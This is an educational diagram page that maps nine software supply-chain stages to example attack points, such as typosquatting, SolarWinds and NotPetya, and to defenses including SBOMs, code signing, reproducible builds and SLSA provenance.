Software Supply Chain: Nine Stages, Nine Places to Inject
flowchart TD
S1["1 · Developer Workstation
local source code"]:::stage A1["⚡ compromised
IDE plugin"]:::attack S2["2 · Source Repository · Git
version control"]:::stage A2["⚡ stolen credentials,
malicious PR"]:::attack S3["3 · Dependency Registry
npm · PyPI · Maven"]:::stage A3["⚡ typosquatting;
event-stream 2018"]:::attack S4["4 · Build Server · CI/CD
source + deps to artifact"]:::stage A4["⚡ SolarWinds 2020"]:::attack S5["5 · Artifact Repository
binaries / container images"]:::stage A5["⚡ registry account
takeover"]:::attack S6["6 · Code Signing
signature applied"]:::stage A6["⚡ stolen signing key"]:::attack S7["7 · Distribution
registry · app store · CDN"]:::stage A7["⚡ in-transit replacement"]:::attack S8["8 · Deploy / Update
on user infrastructure"]:::stage A8["⚡ malicious update;
NotPetya 2017"]:::attack S9["9 · End User
executes the code"]:::stage A9["⚡ skipped verification
at run time"]:::attack S1 --> S2 --> S3 --> S4 --> S5 --> S6 --> S7 --> S8 --> S9 S1 -.-> A1 S2 -.-> A2 S3 -.-> A3 S4 -.-> A4 S5 -.-> A5 S6 -.-> A6 S7 -.-> A7 S8 -.-> A8 S9 -.-> A9 classDef stage fill:#1565c0,stroke:#0d47a1,stroke-width:2px,color:#fff,font-size:13px classDef attack fill:#ffa000,stroke:#e65100,stroke-width:2px,color:#212529,font-size:12px linkStyle default stroke:#90a4ae,stroke-width:2px,font-size:12px
local source code"]:::stage A1["⚡ compromised
IDE plugin"]:::attack S2["2 · Source Repository · Git
version control"]:::stage A2["⚡ stolen credentials,
malicious PR"]:::attack S3["3 · Dependency Registry
npm · PyPI · Maven"]:::stage A3["⚡ typosquatting;
event-stream 2018"]:::attack S4["4 · Build Server · CI/CD
source + deps to artifact"]:::stage A4["⚡ SolarWinds 2020"]:::attack S5["5 · Artifact Repository
binaries / container images"]:::stage A5["⚡ registry account
takeover"]:::attack S6["6 · Code Signing
signature applied"]:::stage A6["⚡ stolen signing key"]:::attack S7["7 · Distribution
registry · app store · CDN"]:::stage A7["⚡ in-transit replacement"]:::attack S8["8 · Deploy / Update
on user infrastructure"]:::stage A8["⚡ malicious update;
NotPetya 2017"]:::attack S9["9 · End User
executes the code"]:::stage A9["⚡ skipped verification
at run time"]:::attack S1 --> S2 --> S3 --> S4 --> S5 --> S6 --> S7 --> S8 --> S9 S1 -.-> A1 S2 -.-> A2 S3 -.-> A3 S4 -.-> A4 S5 -.-> A5 S6 -.-> A6 S7 -.-> A7 S8 -.-> A8 S9 -.-> A9 classDef stage fill:#1565c0,stroke:#0d47a1,stroke-width:2px,color:#fff,font-size:13px classDef attack fill:#ffa000,stroke:#e65100,stroke-width:2px,color:#212529,font-size:12px linkStyle default stroke:#90a4ae,stroke-width:2px,font-size:12px
Color Key
Supply-chain stage
⚡ Attack injection point
Stage & Incident Details
Hover or tap any blue stage or amber ⚡ attack point. Each attack names a real-world incident. Then ask: which defense below would have caught it?
Defenses (mapped to stages)
SBOM — inventory of components. Covers stages 3, 5, 9.
Code signing — applied at 6, verified at 9.
Reproducible builds — stage 4.
Provenance attestations — stages 4–8 (SLSA).